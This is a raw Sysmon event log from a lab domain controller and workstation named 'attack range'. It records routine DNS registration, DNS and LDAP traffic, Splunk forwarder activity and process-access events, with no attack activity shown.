11:32:34.129{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\TtlDWORD (0x000004b0) 13241300x8000000000000000300376Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:34.129{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\SentPriUpdateToIpBinary Data 13241300x8000000000000000300375Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:34.129{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\SentUpdateToIpBinary Data 13241300x8000000000000000300374Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:34.129{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\DnsServersBinary Data 13241300x8000000000000000300373Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:34.129{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\HostAddrsBinary Data 13241300x8000000000000000300372Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:34.129{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\PrimaryDomainNameattackrange.local 13241300x8000000000000000300371Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:34.129{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\AdapterDomainName(Empty) 13241300x8000000000000000300370Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:34.129{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\Hostnamewin-dc-tcontreras-attack-range-173 10341000x8000000000000000300369Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:34.107{C8EA50B7-F11D-6215-0B00-000000003802}6286044C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97022|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+2d0d6|C:\Windows\system32\lsasrv.dll+32475|C:\Windows\system32\lsasrv.dll+302fb|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+1752d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 13241300x8000000000000000300368Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:32:34.107{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{0B32CAAE-ED4E-4625-847F-64846C7677E5}\RegisteredSinceBootDWORD (0x00000001) 354300x8000000000000000300367Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:31.535{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local68bootpcfalse10.0.1.1ip-10-0-1-1.eu-central-1.compute.internal67bootps 23542300x8000000000000000224113Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:35.739{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96C1E2565EF2A57E5AC7FDB9F624B135,SHA256=99DE8CF606970775BE8F48C0239D4B27A2639A29AB403A96E21BECA150242A47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300384Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:35.359{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1A134983903307DDAF8F08C444D1E00,SHA256=977D0B5A3BBCF9406E65D0B8EC253D354729799D17BD1C60F0EF479041FED25E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300383Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:33.066{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local51089- 23542300x8000000000000000224114Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:36.770{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E79371B00CDB5B0066C760FBC1CB69C1,SHA256=DFB52F23CA6A8E61C47DA6626F57B050C3809C75D22EA7D64CB535803B33F73E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300399Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:36.390{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82557A8D9F8F15518C5FCFF15A97290B,SHA256=F008248DAFE2297D5F676982BC5A5B4E6E96705D9350A9DE89429BA8DBC782CA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300398Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:33.594{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local51067- 354300x8000000000000000300397Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:33.591{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local65535-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domain 354300x8000000000000000300396Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:33.591{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruea00:10e:0:0:c830:d833:fbf:ffff-65535-truea00:10e:0:0:0:0:0:0win-dc-tcontreras-attack-range-173.attackrange.local53domain 354300x8000000000000000300395Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:33.590{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local62121- 354300x8000000000000000300394Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:33.589{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local56701- 354300x8000000000000000300393Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:33.589{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local56701-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domain 354300x8000000000000000300392Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:33.581{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local58957-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000300391Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:33.581{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local58957-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000300390Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:33.579{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local65535- 354300x8000000000000000300389Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:33.577{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local58956-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domain 354300x8000000000000000300388Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:33.577{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local58956-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domain 354300x8000000000000000300387Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:33.574{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domainfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local61305- 354300x8000000000000000300386Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:33.574{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local61305-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53domain 354300x8000000000000000300385Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:33.572{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local58222- 23542300x8000000000000000224116Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:37.927{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8727A71C09A9D7BBE3A48B87F01B838,SHA256=628ED917FD116ED1904826FBC85E31985FBDE62E74A987E8C4A89DDAAD99BB77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300400Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:37.407{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DFAFCF14343CBAAA71EA4CEDD3E9E41,SHA256=3910A571E3F0E54358D449D926D965399ED8FB08A59D86B08135E9DD4F57FDAA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000224115Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:35.620{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51833-false10.0.1.12-8000- 23542300x8000000000000000224117Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:38.958{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FC05A24AF1DC81159FD4426B72A5628,SHA256=9A39B82AE0D062DC39D7475CA80E27F1EA4A2B6616849175CAFD171BF0F9C3FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300402Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:38.426{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BADE1138E0D0A5D8F7A723ECC54B5A59,SHA256=AAC8E68B5161F26AB3BC84BEF14DCE27C0C78704C1370E0C8BC1307FE5AF53E3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300401Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:35.680{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local58958-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000300403Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:39.444{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09B12BC1478F90FAD76E47BBB537DC2C,SHA256=4C4382182A38EE7D299CF68382B58DD8B5ADF6506532CCC91991D102CD299DF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300405Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:40.891{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300404Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:40.444{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6572B11436F3DBAF2FFFA188D4F4C159,SHA256=76D66D44226E998B82F7967676727E2415F13434F7EADBC968F3E2366AEF2BD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224118Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:40.005{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=210744DAAF13D77DF6684C0050ED1178,SHA256=1E64E465BB69F96CD6BE52028F3CDB6DD4B5E9DD30E1A663B94C92CECCD72293,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224119Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:41.176{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=970F901A74A4E9F9A9D11F36F24710FC,SHA256=A72B5C434D0F6D0FD984DC7D5D66116DA8F20CCE720CC6C980DF7E5875B36E20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300406Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:41.459{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB61785731886AC460DB414572DE433E,SHA256=7FE50A6ED63F94A51C00273DD4C0382273BF69A89D6F541900F5A12098E5DAB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000224120Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:42.411{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAC4EE7BFE90A4BFEEB45517BE2651BC,SHA256=375AB659E3CF76EAC2B52E7C1421D45A8B4D119AF94E034046DEE9A7156ED8DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300408Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:42.474{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE5A9856CD39320D1E7AAAC57DBEB51A,SHA256=24642CB08B665099D83FE7CB181B062BCD61604DE013EAB487F44A0D1412DBFC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300407Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:40.334{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local58959-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000224121Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:43.458{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04AADCAD640FC8C6C125701934FFF8D5,SHA256=E9611943F8CB628B47312A7B9CA9550BE06CE0A805EBDD2E61BC2CF7C1BB1636,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300409Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:43.505{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC9523965C87AF2255AC400752EB6271,SHA256=AE51C80ADDDFFE596D7851AB88CE5978C0C2F31A2FE36A1F1E37C7FAE3CAFFCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300411Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:32:44.526{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14372251848EF728F8897B29C93266F2,SHA256=2C5E6BB8E5205838436567D8474C5ED6E064813C884E4E06E6DF261FE58AEB0B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000224149Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.895{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1B5C-6216-8005-000000003902}604C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224148Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.895{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224147Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.895{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224146Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:32:44.895{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224145Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 